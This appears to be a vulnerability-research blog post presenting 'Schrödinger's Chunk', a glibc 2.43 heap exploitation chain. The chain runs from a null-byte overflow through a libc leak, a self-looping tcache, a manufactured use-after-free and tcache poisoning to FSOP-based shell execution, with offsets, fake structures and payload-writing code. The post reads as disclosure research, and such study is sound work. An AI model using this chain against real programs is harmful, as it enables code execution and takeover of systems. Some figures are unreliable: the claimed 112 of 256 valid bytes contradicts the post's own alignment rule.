The starting position.
A single null byte. No use-after-free in the target. No double-free. Every mitigation the toolchain offers, Full RELRO, stack canary, NX, PIE, all active. That is the starting position.
This post documents a heap exploitation technique we are calling Schrödinger's Chunk. The name captures the core primitive: a chunk that exists simultaneously in two states, allocated from the program's perspective, freed from the allocator's perspective. We manufacture this condition from nothing by chaining five bugs in glibc 2.43's own allocator code. The target program is correct. The bugs are in glibc.
The canonical entry point is a null byte overflow. But Schrödinger's Chunk is not tied to one primitive. Any corruption that creates overlapping chunk views, including uncontrolled out of bounds writes, weak single byte overwrites, or partial size corruptions, can serve as the entry point. We cover the full range of applicable primitives in a dedicated section before walking through the canonical exploit chain.
Every claim here is verified against the glibc 2.43.9000 source. All five bugs were reported to the glibc security team prior to this publication.
What changed in glibc 2.43.
Understanding Schrödinger's Chunk requires understanding glibc 2.43 specifically. Several changes in this release shifted the attack surface in ways that are not immediately obvious.
Fastbins removed
glibc 2.43 removed fastbins entirely. Everything small now flows through
either the tcache (fast path) or the full consolidation machinery
(_int_free_merge_chunk). There is no middle
layer. This makes the tcache the sole fast allocation path for small
chunks. Any bug in the tcache now affects a much larger fraction of all
program allocations.
Tcache expanded to 76 bins
The tcache grew from 64 size classes (up to 0x410)
to 76: 64 small bins plus 12 large bins.
TCACHE_SMALL_BINS = 64,
TCACHE_LARGE_BINS = 12,
TCACHE_MAX_BINS = 76. The
tcache_perthread_struct expanded accordingly.
It now holds uint16_t num_slots[76] (152 bytes)
and tcache_entry *entries[76] (608 bytes),
totaling 760 bytes.
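The byte counts above can be reproduced with a small model. This is only a sketch: the `TcachePerthreadModel` class is a hypothetical stand-in that mirrors the two arrays named in the text, with pointers modelled as 64-bit integers, and it is not glibc's actual definition.

```python
import ctypes

TCACHE_SMALL_BINS = 64
TCACHE_LARGE_BINS = 12
TCACHE_MAX_BINS = TCACHE_SMALL_BINS + TCACHE_LARGE_BINS


class TcachePerthreadModel(ctypes.Structure):
    # Hypothetical model of the two arrays described in the text.
    # Pointers are modelled as 64-bit integers so the result does not
    # depend on the machine running this script.
    _fields_ = [
        ("num_slots", ctypes.c_uint16 * TCACHE_MAX_BINS),
        ("entries", ctypes.c_uint64 * TCACHE_MAX_BINS),
    ]


num_slots_bytes = ctypes.sizeof(ctypes.c_uint16 * TCACHE_MAX_BINS)
entries_bytes = ctypes.sizeof(ctypes.c_uint64 * TCACHE_MAX_BINS)
struct_bytes = ctypes.sizeof(TcachePerthreadModel)

print(TCACHE_MAX_BINS, num_slots_bytes, entries_bytes, struct_bytes)
```

Because 152 is a multiple of 8, no padding is needed between the two arrays in this model, which is why the total is simply the sum of the two parts.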
Lazy tcache initialization
This is the structurally important change. In glibc
2.35 the tcache_perthread_struct was allocated
during the first malloc(). In glibc 2.43 it is
allocated lazily, during the first free(). The
trigger in __libc_free is:
if (__glibc_unlikely (tcache_inactive ()))
return tcache_free_init (mem);
tcache_free_init calls
tcache_init(NULL) (which calls
__libc_malloc2 to allocate the struct) and then
re-calls __libc_free on the original chunk. The
heap layout consequence is deterministic:
Early init (glibc 2.35):
first malloc() → allocate tcache struct → allocate requested chunk
Lazy init (glibc 2.43):
malloc() #1 → allocate chunk directly (no tcache yet)
free() #1 → allocate tcache struct via tcache_free_init → re-free chunk
Resulting layout:
heap_base + 0x000: first malloc chunk (e.g. 0x20 for malloc(1))
heap_base + 0x020: tcache_perthread (0x310)
heap_base + 0x330: second malloc chunk
Given any heap address leak, the address of every subsequent allocation is computable by arithmetic. This has a direct consequence for safe-linking.
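As a rough illustration of that arithmetic, the sketch below derives the three chunk addresses from a heap base. The chunk sizes are copied from the layout listing above, and `example_base` is a made-up value used only for demonstration.

```python
FIRST_CHUNK_SIZE = 0x20     # chunk size for malloc(1), from the layout above
TCACHE_CHUNK_SIZE = 0x310   # tcache struct chunk size, from the layout above


def early_layout(heap_base):
    """Chunk start addresses for the lazy-init layout described in the text."""
    first = heap_base
    tcache = first + FIRST_CHUNK_SIZE
    second = tcache + TCACHE_CHUNK_SIZE
    return {"first": first, "tcache": tcache, "second": second}


example_base = 0x555555559000  # hypothetical leaked heap base
for name, addr in early_layout(example_base).items():
    print(f"{name:>6}: {addr:#x}")
```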
Relaxed tcache free path
In __libc_free, when a freed chunk is
tcache-eligible, glibc 2.43 takes an early return directly to
tcache_put after only two checks: pointer
alignment and tcache eligibility by size. The
check_inuse_chunk call that existed on the
tcache path in prior versions is gone. The size field is accepted as is
as long as it falls within a valid tcache bin range. This is how size
field corruption becomes exploitable on this version.
The allocator's bookkeeping.
Before diving into the bugs, here is the allocator state we are working with.
Chunks
Every heap allocation is a chunk. The header lives immediately before the user pointer and contains two 8 byte fields:
chunk_ptr
│
▼
┌───────────────────┐ ← chunk header
│ prev_size (8B) │ only valid when prev chunk is free
├───────────────────┤
│ size (8B) │ total chunk size | flags in low 3 bits
├───────────────────┤ ← user pointer (what malloc returns)
│ │
│ user data │
│ │
└───────────────────┘
Bit 0 of size is
PREV_INUSE: 1 means the preceding chunk is
allocated, 0 means it is free. When PREV_INUSE
is 0, prev_size is valid and tells the
allocator how far back to walk to find the free predecessor.
Tcache
typedef struct tcache_entry {
struct tcache_entry *next; // safe-linked pointer to next free chunk
uintptr_t key; // double-free detection token
} tcache_entry;
num_slots[i] in
tcache_perthread_struct counts how many
additional entries bin i can still accept. It
starts at mp_.tcache_count (default 7) for an
empty bin. Each free to tcache decrements it. Each allocation from
tcache increments it. The guard in __libc_free
for accepting a chunk into tcache is
num_slots[tc_idx] != 0.
Safe-linking
Since glibc 2.32, tcache next pointers are
stored encoded:
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
PROTECT_PTR(pos, ptr) computes
(pos >> 12) ^ ptr. The
pos >> 12 component is the XOR key,
derived from the pointer's own storage address. Because ASLR operates
at page granularity (12 bits), this key contains only the randomized
bits. Without knowing the storage address, you cannot compute the key
to forge a next pointer. In theory.
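The encoding is easy to model outside of C. The following is a minimal sketch of the two macros as plain integer arithmetic; the addresses are hypothetical and chosen only to show the round trip.

```python
def protect_ptr(pos, ptr):
    """Model of PROTECT_PTR: XOR the pointer with its storage address >> 12."""
    return (pos >> 12) ^ ptr


def reveal_ptr(pos, stored):
    """Model of REVEAL_PTR: the same XOR applied to the stored value."""
    return protect_ptr(pos, stored)


pos = 0x55555555A2A0   # hypothetical address of a next field
ptr = 0x55555555A330   # hypothetical pointer being stored there

stored = protect_ptr(pos, ptr)
recovered = reveal_ptr(pos, stored)
end_of_list = protect_ptr(pos, 0)  # how a NULL next is stored

print(hex(stored), hex(recovered), hex(end_of_list))
```

Note that a NULL `next` is stored as `pos >> 12`, so the stored value at the end of a list is the key itself.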
Five bugs in glibc 2.43.
We identified five defects in glibc 2.43's tcache implementation. Here they are in summary before showing how they connect.
- Bug 1 (no cycle detection): Neither tcache_put_n nor tcache_get_n checks whether the list contains a cycle. A chunk whose next field decodes back to itself creates an infinite list. Every pop returns the same address. This is the foundation of Schrödinger's Chunk.
- Bug 2 (no count bound): num_slots is a uint16_t. The logical maximum is 7. The increment in tcache_get_n has no bounds check. After two pops from a self-referencing loop the value reaches 8. The capacity guard (num_slots != 0) keeps accepting frees that should be rejected.
- Bug 3 (key clearing defeats the double-free gate): tcache_get_n unconditionally clears e->key = 0 on every pop. After our double pop, key is 0 while tcache_key is non-zero, so the Stage 1 comparison fails and Stage 2 never runs.
- Bug 4 (lazy init makes the layout deterministic): Because the tcache struct is allocated on the first free(), and the first malloc() always lands at heap base, the layout is fixed. The safe-linking key for any chunk is addr >> 12. Pure arithmetic. No freed memory read needed.
- Bug 5 (raw bin head pointers): Tcache next fields use PROTECT_PTR. The entries[idx] head pointers in tcache_perthread_struct are stored raw. Any primitive reaching the tcache struct can redirect a bin head without computing a safe-linking key.
Bug 1 in detail
tcache_put_n prepends a new chunk to its bin
and decrements num_slots.
tcache_get_n pops the head and increments
num_slots. Neither function checks whether the
linked list contains a cycle.
/* tcache_put_n (excerpt) */
e->next = PROTECT_PTR (&e->next, *ep); // store safe-linked next
*ep = e; // set as new head (raw, no PROTECT_PTR)
--(tcache->num_slots[tc_idx]);
/* tcache_get_n (excerpt) */
*ep = REVEAL_PTR (e->next); // advance head
++(tcache->num_slots[tc_idx]);
e->key = 0;
return (void *) e;
Neither operation checks whether the chunk being inserted is already
present in the list, or whether following next
pointers from the new head eventually reach NULL. A chunk whose
next field decodes back to itself creates an
infinite list. Without the ability to create a cycle, we cannot get
malloc to return the same address twice. No
duplicate address means no two independent handles to the same memory.
No two handles means no manufactured UAF.
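The effect of a cycle can be seen in a toy model of a single bin. This is a sketch under simplifying assumptions: `TcacheBinModel` is a hypothetical class, memory is a dictionary keyed by entry address, the slot counter is left out, and the address `E` is invented for the example.

```python
def protect_ptr(pos, ptr):
    return (pos >> 12) ^ ptr


class TcacheBinModel:
    """Toy model of one tcache bin; next is the first field, so &e->next == e."""

    def __init__(self):
        self.head = 0          # raw head pointer, 0 stands for NULL
        self.next_field = {}   # entry address -> stored (encoded) next

    def put(self, e):
        self.next_field[e] = protect_ptr(e, self.head)
        self.head = e

    def get(self):
        e = self.head
        self.head = protect_ptr(e, self.next_field[e])  # REVEAL_PTR
        return e


E = 0x55555555A350  # hypothetical chunk address

# Control: an untouched list empties after one pop.
control = TcacheBinModel()
control.put(E)
control_first = control.get()
control_head_after = control.head

# Cycle: the stored next is replaced with a value that decodes to E itself.
looped = TcacheBinModel()
looped.put(E)
looped.next_field[E] = protect_ptr(E, E)
a = looped.get()
b = looped.get()

print(hex(control_first), control_head_after, hex(a), hex(b), hex(looped.head))
```

In the control case the head becomes NULL after one pop. In the looped case the head never moves, so both pops hand back the same address.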
Bug 3 in detail
glibc's double-free detection uses two stages.
Stage 1 (fast gate) in __libc_free
if (__glibc_unlikely (e->key == tcache_key))
return tcache_double_free_verify (e);
Stage 2 (list walk) in tcache_double_free_verify
for (size_t tc_idx = 0; tc_idx < TCACHE_MAX_BINS; ++tc_idx) {
size_t cnt = 0;
for (tmp = tcache->entries[tc_idx]; tmp;
tmp = REVEAL_PTR(tmp->next), ++cnt) {
if (cnt >= mp_.tcache_count)
malloc_printerr ("free(): too many chunks detected in tcache");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
}
}
The list walk scans every tcache bin for the chunk being freed. With a
self-referencing loop, tmp would equal
e on the very first iteration. Stage 2 would
catch it immediately.
But Stage 2 only runs when the Stage 1 key comparison matches. The problem is what
tcache_get_n does on every pop:
e->key = 0. The key is unconditionally
cleared on every allocation. After our double pop from the
self-referencing loop, the chunk's key is 0.
When we re-free the chunk, the Stage 1 check evaluates
(0 == tcache_key) as false. Stage 2
never runs. The list walk that would have caught the
double-free does not execute.
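The gating logic can be summarized in a few lines. The sketch below is a deliberately simplified model, not glibc code: `TCACHE_KEY` is an arbitrary stand-in for the random per-process key, and the list walk is reduced to a membership test.

```python
TCACHE_KEY = 0x9E3779B97F4A7C15  # arbitrary nonzero stand-in for tcache_key


def free_outcome(entry_key, entry_addr, bin_entries):
    """Return which branch the two-stage double-free check reaches."""
    if entry_key == TCACHE_KEY:          # Stage 1: fast gate
        if entry_addr in bin_entries:    # Stage 2: list walk (simplified)
            return "abort: double free detected"
        return "stage 2 ran, no match"
    return "stage 2 skipped"


E = 0x55555555A350  # hypothetical chunk address

# Ordinary double free: the key is still set and the chunk is in the bin.
ordinary = free_outcome(TCACHE_KEY, E, [E])

# After a pop: the key was cleared to 0, yet the chunk is still reachable
# from the bin head because of the self-referencing loop.
after_pop = free_outcome(0, E, [E])

print(ordinary)
print(after_pop)
```

The second call shows the gap the text describes: the chunk is in the list, but the walk that would find it is never reached.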
Entry points and primitives.
Schrödinger's Chunk requires one thing from the bug in your target: an overlapping chunk, a situation where one live, program-visible handle and one allocator-visible free chunk reference the same physical memory. Once you have that, the rest of the chain (self-referencing loop, schr allocation, manufactured UAF, tcache poison) runs from glibc's own bugs.
Program view: "M is live, I can read and write through it."
Allocator view: "M is free, it is in a bin."
Reading through the program handle reads allocator metadata. Writing through it corrupts allocator metadata. Any corruption path that leaves these two views inconsistent is sufficient. The five glibc bugs do not care how the overlap was created.
Path A · Null byte overflow (canonical)
Bug class: off-by-one null byte write past a heap buffer.
Mechanism: the null byte at
buf[n] lands on byte 0 of the adjacent chunk's
size field, clearing
PREV_INUSE (bit 0). When that adjacent chunk is
freed, the allocator walks backward by
prev_size bytes, finds a fake free chunk we
constructed in our live buffer, passes the self-pointing unlink check,
and merges. The merged chunk goes into the unsorted bin, but our live
handle still covers that same memory.
Before:
┌──────────────────┬──────────────────┐
│ [prev] 0x510 │ [victim] 0x500 │
│ in use │ PREV_INUSE=1 │
└──────────────────┴──────────────────┘
After null byte at offset 0x508 (clears victim's PREV_INUSE):
┌──────────────────┬──────────────────┐
│ [prev] 0x510 │ [victim] 0x500 │
│ in use │ PREV_INUSE=0 ← │
└──────────────────┴──────────────────┘
After free(victim):
┌────────────────────────────────────────────────────────────┐
│ [merged] 0xA00 in unsorted bin │
│ │
│ prev handle still valid → overlap achieved │
└────────────────────────────────────────────────────────────┘
Path B · Uncontrolled out of bounds write
Bug class: an OOB write where the position is attacker controlled (or predictable) but the bytes written are not. Examples include audio data, network payload echoes, timer values, or any structured host-provided content.
Mechanism: glibc 2.43's
__libc_free on the tcache path performs
essentially no size field validation. If we can corrupt the low byte of
an adjacent chunk's size field, we can make the
allocator believe the chunk is a different size than it actually is. We
then free that chunk and it enters the wrong tcache bin. When we
reclaim from that bin we get a chunk that is "larger" than the actual
allocation, overlapping the chunk after it.
Path C · Controlled single byte write
Bug class: an arbitrary single byte write, one byte, attacker chosen value, attacker chosen address.
With one controlled byte you can write any value to byte 0 of a target
chunk's size field. This gives full control
over the low byte, allowing deterministic corruption to a specific
larger size (e.g., 0x200 → 0x280). The rest of
the path is identical to Path B, but without probability uncertainty.
This is the strongest single byte variant.
Path D · Multi-byte overflow with partial control
An overflow where some bytes are attacker controlled and others are not. The more bytes of control you have, the more flexibility you gain in choosing the target size class and the consolidation distance.
Path E · Use-after-free with write capability
A real UAF in the target program. With a dangling pointer to a freed chunk, creating the overlap is direct. Schrödinger's Chunk augments this path by enabling the self-referencing loop and the double-pop UAF manufacture, potentially turning a one-shot tcache poison into a persistent UAF primitive.
| Entry | Bytes controlled | Mechanism | Reliability |
|---|---|---|---|
| Null byte overflow | 0 (always \x00) | PREV_INUSE clear → backward consolidation | Deterministic |
| Uncontrolled OOB | 0 (data dependent) | Size field corruption → wrong tcache bin | Retry based (~44%) |
| Controlled single byte | 1 byte, chosen | Size field corruption → wrong tcache bin | Deterministic |
| Multi-byte partial | Partial | Size + prev_size corruption | Varies |
| Real UAF | Full write to freed chunk | Direct tcache entry corruption | Depends on heap leak |
For all paths, once the overlap exists, Bugs 1 through 4 are the mechanism for manufacturing the use-after-free, defeating safe-linking without a freed memory read, and bypassing double-free detection. The entry point only determines how you get to the overlap. The downstream chain is the same.
The uncontrolled write case.
The uncontrolled case deserves deeper treatment because it is the most common class of real-world memory corruption. Many vulnerabilities in device emulators, network protocol handlers, and audio or video pipelines produce out of bounds writes where the attacker controls how many bytes overflow but not what they contain.
The question is: how do you reason about a corruption primitive when you do not know the bytes?
Frame it as a search problem
You need the corrupted low byte of the size field to satisfy:
- byte & 0x0F == 0 (16 byte alignment, mandatory)
- byte & 0x02 == 0 (IS_MMAPPED clear, otherwise abort)
- byte != 0x00 (zero means PREV_INUSE clear and size shrinks)
- The resulting full size falls within a valid tcache bin range
Across the 256 possible byte values, roughly 112 (about 44%) satisfy all constraints and produce a valid tcache-eligible size. For a uniformly random byte, the probability per attempt is approximately 44%.
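To get a feel for what a per-attempt probability of this size means for a retry loop, here is a small sketch. It assumes attempts are independent and takes the 112-out-of-256 figure quoted above as given. The helper name `p_success_within` is made up for this example.

```python
def p_success_within(p, attempts):
    """Probability of at least one success in `attempts` independent tries."""
    return 1.0 - (1.0 - p) ** attempts


p = 112 / 256                 # per-attempt probability quoted in the text
expected_attempts = 1.0 / p   # mean of a geometric distribution

for k in (1, 2, 3, 5, 8):
    print(k, round(p_success_within(p, k), 4))
print(round(expected_attempts, 2))
```

Under these assumptions a handful of retries is enough to make success very likely. A different per-attempt probability would change the numbers but not the shape of the curve.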
In practice, data is not uniformly random. For audio (u8 PCM silence
is 0x80), the distribution clusters around
0x80 = 0b10000000.
0x80 & 0x0F == 0 (aligned),
0x80 & 0x02 == 0 (not IS_MMAPPED). This is
a valid byte. For ALSA audio data during quiet periods, the dominant
byte value directly satisfies the constraints, making reliability very
high.
Retry loop structure
1. Heap spray: build layout of repeated same size chunks.
2. Create holes by freeing alternating chunks.
3. Allocate overflowing buffer into a hole.
4. Let overflow occur (one attempt).
5. Check: did we get a useful size corruption? Try allocating from the expected target bin. If it returns a chunk that overlaps our spray region, success. If not, free the buffer, refill the hole, return to step 3.
6. On success, proceed with the overlap.
The retry adds allocation noise. To prevent that noise from disrupting the heap layout, the spray and hole structure should be built with enough redundancy that a few failed attempts do not destroy the geometry.
Initial heap layout.
The technique begins with three allocations after program startup:
┌────────────────────────────────────────────────────────────────────────┐
│ heap_base + 0x000 │
├────────────────────────────────────────────────────────────────────────┤
│ [taste] 0x20 ← first malloc() before tcache exists │
├────────────────────────────────────────────────────────────────────────┤
│ [tcache] 0x310 ← allocated by tcache_free_init() on first free() │
│ │
│ num_slots[i] = 7 for all i (mp_.tcache_count, all slots available) │
│ entries[i] = NULL for all i │
├────────────────────────────────────────────────────────────────────────┤
│ [prev] 0x510 ← source of the null byte overflow (0x508 usable) │
├────────────────────────────────────────────────────────────────────────┤
│ [victim] 0x500 ← consolidation target │
├────────────────────────────────────────────────────────────────────────┤
│ [barrier] 0x90 ← prevents top-chunk merge when victim is freed │
├────────────────────────────────────────────────────────────────────────┤
│ [top] ... │
└────────────────────────────────────────────────────────────────────────┘
The layout is deterministic (Bug 4).
prev's user pointer is
heap_base + 0x330. We know this from the heap
leak alone. No UAF needed, no guessing.
The null byte primitive: writing 0x508 bytes to
prev and appending a null terminator writes
\x00 at
prev_user + 0x508. This address is exactly byte
0 of victim's size
field. Since PREV_INUSE is bit 0 of
size, this single null byte clears it.
Phase 1 · Backward consolidation.
Clearing PREV_INUSE on victim tells the
allocator the preceding chunk is free when victim is freed. We need
four things to be true for the consolidation to proceed without
crashing.
- victim->prev_size must point back to a valid fake chunk
- That fake chunk must have a consistent size field
- The unlink integrity check (fd->bk == p && bk->fd == p) must pass
- The size consistency checks must pass
We satisfy all four by writing into prev's data area:
offset value meaning
───────────────────────────────────────────────────────────
+0x00 (any) fake chunk's prev_size (not checked)
+0x08 0x501 fake chunk's size: 0x500 | PREV_INUSE=1
+0x10 prev_user fake fd = self
+0x18 prev_user fake bk = self
... (any)
+0x500 0x500 victim's prev_size field
+0x508 \x00 ← null byte clears victim's PREV_INUSE
The fake chunk's chunk pointer is
prev_user. We treat
prev_user + 0x00 as
prev_size and
prev_user + 0x08 as
size. Its size is 0x500.
Unlink check
(fd->bk == p && bk->fd == p):
with fd = bk = prev_user = p, both checks
become p->bk == p and
p->fd == p. True. The unlink runs and is a
harmless no-op.
Size consistency checks in
unlink_chunk and
_int_free_merge_chunk both pass because
chunksize(fake) = 0x500 equals
victim->prev_size = 0x500.
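The offsets in the table can be checked for internal consistency with a small model. This is a sketch only: it lays the values out in a byte buffer and replays the conditions described above in plain Python. The function names and the `prev_user` value are hypothetical, and nothing here calls into glibc.

```python
import struct

FAKE_SIZE = 0x500
PREV_INUSE = 0x1
VICTIM_OFF = 0x500  # victim's chunk header, relative to prev_user


def build_region(prev_user):
    """Bytes from prev_user through victim's size field, after the overflow."""
    buf = bytearray(VICTIM_OFF + 0x10)
    struct.pack_into("<Q", buf, 0x08, FAKE_SIZE | PREV_INUSE)  # fake size
    struct.pack_into("<Q", buf, 0x10, prev_user)               # fake fd = self
    struct.pack_into("<Q", buf, 0x18, prev_user)               # fake bk = self
    struct.pack_into("<Q", buf, VICTIM_OFF, FAKE_SIZE)         # victim prev_size
    struct.pack_into("<Q", buf, VICTIM_OFF + 8, 0x501)         # victim size before
    buf[VICTIM_OFF + 8] = 0x00                                 # the null byte
    return buf


def check_consolidation(prev_user, buf):
    def q(addr):  # read a little-endian 64-bit value at a modelled address
        return struct.unpack_from("<Q", buf, addr - prev_user)[0]

    victim = prev_user + VICTIM_OFF
    victim_size = q(victim + 8)
    prev_size = q(victim)
    p = victim - prev_size
    fd, bk = q(p + 0x10), q(p + 0x18)
    return {
        "prev_inuse_clear": (victim_size & PREV_INUSE) == 0,
        "fake_is_prev_user": p == prev_user,
        "size_matches": (q(p + 8) & ~0x7) == prev_size,
        "unlink_ok": q(fd + 0x18) == p and q(bk + 0x10) == p,
        "merged_size": prev_size + (victim_size & ~0x7),
    }


prev_user = 0x555555559340  # hypothetical user pointer
result = check_consolidation(prev_user, build_region(prev_user))
print(result)
```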
When victim is freed, _int_free_merge_chunk runs:
Step 1: victim->size has PREV_INUSE=0 ← cleared by null byte
Step 2: read victim->prev_size = 0x500
Step 3: p = chunk_at_offset(victim, -0x500) = prev_user
Step 4: chunksize(fake) == prevsize → 0x500 == 0x500 ✓ no abort
Step 5: unlink_chunk(fake) → self-pointing passes check ✓ no-op
Step 6: merged chunk at prev_user, size 0x500+0x500=0xA00
Step 7: insert into unsorted bin
The result:
Memory at prev_user (post-consolidation):
┌──────────────────────────────────────────────────────────────┐
│ merged chunk (0xA00) · in unsorted bin │
│ │
│ prev_user+0x00: prev_size │
│ prev_user+0x08: size = 0xA01 (PREV_INUSE set) │
│ prev_user+0x10: fd → main_arena+0x08 ← libc pointer │
│ prev_user+0x18: bk → main_arena+0x08 │
│ ... │
└──────────────────────────────────────────────────────────────┘
▲
│ prev entry in program's tracking table still points here
│ program believes prev is a live 0x508-byte allocation
│ we can read and write through it
Overlap established. The allocator owns this memory
as a free chunk. The program thinks
prev is a live allocation.
Phase 2 · Libc leak.
The merged chunk is the only entry in the unsorted bin. The unsorted
bin is a circular doubly linked list rooted in
main_arena. A lone entry has
fd = bk = main_arena + 0x08. These pointers
sit at prev_user + 0x10 and
prev_user + 0x18, inside our overlap region.
data = show(prev)
unsorted_fd = unpack64(data[0x10:0x18])
libc_base = unsorted_fd - (main_arena_offset + 0x08)
Libc base acquired. No additional primitive required.
Phase 3 · Self-referencing tcache loop.
We carve a small chunk from the merged region:
malloc(0x88) carved from merged chunk:
E at prev_user + 0x10 (unsorted bin allocates from the front)
After free(E):
tcache[0x90]: head → E
E->next = PROTECT_PTR(&E->next, NULL) = E_user >> 12
num_slots[0x90] = 6
Now Bug 4: the layout is deterministic, so we know
E_user = prev_user + 0x10. We compute:
safe_key = E_user >> 12
self_loop = safe_key ^ E_user # = PROTECT_PTR(E_user, E_user)
No reading from freed memory. Pure arithmetic.
Through the overlap we overwrite E->next
(at prev_user + 0x10) with
self_loop:
# E_user = prev_user + 0x10
# E->next field is at E_user + 0x00 = prev_user + 0x10
struct.pack_into("<Q", overlap_buf, 0x10, self_loop)
edit(prev, overlap_buf)
Verification:
REVEAL_PTR(E->next)
= PROTECT_PTR(&E->next, E->next)
= (E_user >> 12) ^ ((E_user >> 12) ^ E_user)
= E_user ← loop back to E
The bin head never advances:
tcache[0x90]:
head
│
▼
┌──────────────┐
│ E │
│ next ───────┼──► (decodes to E_user)
└──────────────┘
▲ │
└────┘
∞
Every pop returns E_user. The list is infinite.
Phase 4 · Schr allocation.
Two consecutive pops from the infinite bin:
A = malloc(0x88) # returns E_user
B = malloc(0x88) # returns E_user again
The program's tracking table now has:
┌─────────────────────────────────────────────────────────────┐
│ tracking_table[A]: data = E_user, in_use = 1 │
│ tracking_table[B]: data = E_user, in_use = 1 │
│ ▲ │
│ └── same physical memory │
└─────────────────────────────────────────────────────────────┘
Two independent entries. One chunk. And the
num_slots overflow:
Initial state: num_slots[0x90] = 7
After free(E): num_slots[0x90] = 6
After pop A: num_slots[0x90] = 7
After pop B: num_slots[0x90] = 8 ← exceeds mp_.tcache_count
The counter now claims there are 8 available slots. The logical maximum is 7. No bounds check prevented this (Bug 2). The inflated count will shortly allow a free to go through that should be rejected.
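The counter trace above is simple enough to replay in a few lines. The sketch below models `num_slots` as a 16-bit counter and compares the unbounded increment with the clamp proposed in the fix table at the end of this post. The `trace` helper is hypothetical.

```python
TCACHE_COUNT = 7  # default mp_.tcache_count, as stated in the text


def trace(ops, clamp=False):
    """Replay free/pop operations on a modelled uint16_t num_slots counter."""
    slots = TCACHE_COUNT
    history = [slots]
    for op in ops:
        if op == "free":
            slots -= 1
        elif op == "pop":
            slots += 1
            if clamp:
                slots = min(slots, TCACHE_COUNT)
        slots &= 0xFFFF  # uint16_t wraparound
        history.append(slots)
    return history


ops = ["free", "pop", "pop"]  # free(E), pop A, pop B
unbounded = trace(ops)
clamped = trace(ops, clamp=True)

print(unbounded)
print(clamped)
```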
Phase 5 · Manufacturing the use-after-free.
Current state:
tracking_table[A]: data = E_user, in_use = 1
tracking_table[B]: data = E_user, in_use = 1
tcache[0x90]: head → E → E → E → ... (self-loop)
E->key = 0 ← cleared by both pops in tcache_get_n
We free A:
free(tracking_table[A].data):
p = E_user
e = (tcache_entry *) E_user
Stage 1 gate: (e->key == tcache_key)
= (0 == random_nonzero)
= false ← Bug 3 bypasses Stage 2
tcache_double_free_verify: NEVER CALLED
Guard: (num_slots[0x90] != 0) = (8 != 0) = true ← Bug 2 enables this
tcache_put(E):
e->key = tcache_key (chunk marked as in-tcache)
E->next = PROTECT_PTR(E, head) (points to current head = E_user)
head = E_user
num_slots[0x90] = 7
tracking_table[A]: data = NULL, in_use = 0 ← program cleans up A
tracking_table[B]: data = E_user, in_use = 1 ← B untouched
The state after free(A):
Physical memory at E_user:
┌────────────────────────────────────────────────────────────┐
│ Allocator view: tcache[0x90] head → THIS chunk │
│ E->next = some encoded pointer │
│ E->key = tcache_key │
│ │
│ Program view (through tracking_table[B]): │
│ "live allocation at E_user" │
│ write(B, data) → writes to E_user → WRITES TO FREED │
│ TCACHE METADATA │
└────────────────────────────────────────────────────────────┘
The chunk is simultaneously:
Freed. The allocator sees it at the head of tcache[0x90].
Live. The program sees it as a valid allocation through handle B.
Writing through B is a use-after-free. The target program has no UAF bug. This primitive was manufactured entirely from three glibc bugs interacting:
| Bug | Role |
|---|---|
| Bug 1 — no cycle detection | Created the self-referencing loop → two handles |
| Bug 2 — no count bound | num_slots = 8, allowed the re-free to pass the capacity guard |
| Bug 3 — key clearing defeats gate | e->key = 0, Stage 1 gate failed, Stage 2 list walk never ran |
None of them alone is sufficient. Each is load-bearing.
Phase 6 · Tcache poisoning and arbitrary allocation.
Through handle B we write to E_user,
overwriting E->next in the freed chunk:
target = tracking_table_addr # program's allocation array in BSS
safe_key = E_user >> 12 # computed, no read needed (Bug 4)
poison = safe_key ^ target # PROTECT_PTR(E_user, target)
write(B): E->next = poison
The tcache chain for bin 0x90 now reads:
tcache[0x90]:
head → E_user → tracking_table → ???
Two more pops:
malloc(0x88) # returns E_user (discard — this is the freed chunk)
malloc(0x88) # returns tracking_table ← ARBITRARY ALLOCATION
We hold an allocation overlapping the program's own bookkeeping. By editing this allocation we can redirect any entry's data pointer to any address. Full arbitrary read and write.
┌─────────────────────────────────────────────────────────────────┐
│ tracking_table (BSS) ← we have an allocation here │
│ │
│ entry[0]: data ptr ←── WE WRITE THIS to any target address │
│ size ←── and this │
│ in_use = 1 │
│ entry[1]: ... │
│ │
│ Point entry[0].data to any address → read/write via show/edit │
└─────────────────────────────────────────────────────────────────┘
Phase 7 · FSOP to shell.
Full RELRO eliminates GOT overwrites. The target is
stdout's _IO_FILE
structure in libc's data segment.
Since glibc 2.24, the regular vtable pointer in
_IO_FILE_plus (at
+0xd8) is range-validated against
__libc_IO_vtables on every I/O operation.
Pointing it outside this range causes an abort.
However, the wide character vtable,
_wide_data->_wide_vtable, has no range
check. _IO_wide_data is pointed to by
stdout->_wide_data (at
+0xa0). Inside
_IO_wide_data,
_wide_vtable lives at
+0xe0. This field dispatches to
__doallocate (at +0x68
in _IO_jump_t) when the wide character buffer
needs initialization. No validation ever touches it.
printf("prompt")
│
▼ stdout->vtable = _IO_wfile_jumps (legitimate — passes range check)
│
▼ _IO_wfile_xsputn → _IO_wfile_overflow
│ (wide buffer is NULL, needs allocation)
│
▼ _IO_wdoallocbuf
│
▼ fp->_wide_data->_wide_vtable->__doallocate(fp)
│ ▲ NOT range-checked
│
▼ our controlled function pointer
│
▼ shell
We build fake structures in the overlap region at known addresses (deterministic layout, Bug 4):
prev_user + 0x100: fake _IO_lock_t
┌─────────────────┐
│ 16 bytes zero │ ← "unlocked" state for the stdio lock
└─────────────────┘
prev_user + 0x200: fake _IO_wide_data
┌──────────────────────────────────────────────────┐
│ ... │
│ +0xe0: _wide_vtable ptr → prev_user + 0x300 │
└──────────────────────────────────────────────────┘
prev_user + 0x300: fake _IO_jump_t (wide vtable)
┌──────────────────────────────────────────────────┐
│ ... │
│ +0x68: __doallocate → win() │
└──────────────────────────────────────────────────┘
Four writes into stdout via the arbitrary
write primitive:
| stdout field | offset | value written |
|---|---|---|
| _flags | +0x00 | 0xFBAD2000: clears _IO_UNBUFFERED, enables wide path |
| _lock | +0x88 | prev_user + 0x100: our zeroed fake lock |
| _wide_data | +0xa0 | prev_user + 0x200: our fake _IO_wide_data |
| vtable | +0xd8 | _IO_wfile_jumps: legitimate, passes range check, triggers dispatch |
The vtable write is the trigger. The next
printf dispatches through
_IO_wfile_jumps, reaches
_IO_wdoallocbuf, reads
stdout->_wide_data->_wide_vtable->__doallocate,
finds our controlled pointer, and calls it.
Shell.
The full chain.
off-by-one null byte
│
